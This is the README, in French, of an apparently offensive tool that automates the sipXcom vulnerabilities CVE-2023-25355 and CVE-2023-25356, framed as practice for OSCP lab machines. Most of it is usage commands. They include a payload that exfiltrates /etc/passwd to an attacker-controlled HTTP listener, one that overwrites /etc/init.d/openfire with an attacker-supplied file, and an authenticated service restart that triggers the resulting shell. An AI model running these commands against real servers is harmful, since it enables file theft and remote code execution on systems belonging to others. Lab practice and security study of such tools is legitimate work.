
CVE-2023-25355 et CVE-2023-25356 avec rechargement automatique du service
L'exploit a été découvert par [email protected] et est présenté dans deux documents remarquables :
Un dépôt pour automatiser encore plus cette vulnérabilité a été publié par Alex Linov :
Le CVE-2023-25355 est un mécanisme d'exfiltration où les fichiers du serveur sipXcom sont téléchargés sur un serveur web contrôlé par l'attaquant.
Le CVE-2023-25356 est une extension de la première vulnérabilité où des fichiers contrôlés par l'attaquant peuvent être écrits sur le système de fichiers du serveur sipXcom. Étant donné que le service sipXcom peut écraser sa propre configuration init, un shell peut donc être obtenu facilement dès que le service est redémarré.
Le point intéressant à noter ici est que l'utilisateur superadmin de sipXcom peut redémarrer ce service. Par conséquent, le but de ce paquet est d'automatiser complètement le redémarrage de ce service.
Pour préparer l'OSCP, il existe des laboratoires avec des machines à pwn.
Dans un laboratoire spécifique, une machine sujette à cette vulnérabilité est/était assez instable, ce qui signifie que vous deviez parfois démarrer et restaurer le laboratoire plusieurs fois. C'est ennuyeux. Une fois automatisé, c'est moins ennuyeux.
Vous avez besoin de :
poetry install
Ensuite, vous pouvez soit exécuter l'outil depuis l'environnement actif, soit depuis le répertoire, soit ailleurs avec le nom du CVE :
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help
# otherwise, from the current directory
poetry run cve_2023_25355 --help
# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
Dans l'exemple suivant, nous envoyons un payload pour exfiltrer le fichier /etc/passwd qui sera téléchargé vers un serveur HTTP contrôlé.
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
Dans l'exemple suivant, nous envoyons un payload pour écraser le fichier /etc/init.d/openfire avec le contenu de l'URI fournie.
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
Ensuite, si nous connaissons le mot de passe superadmin, nous pouvons redémarrer le service pour recharger la configuration et déclencher n'importe quel gadget.
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
Projet :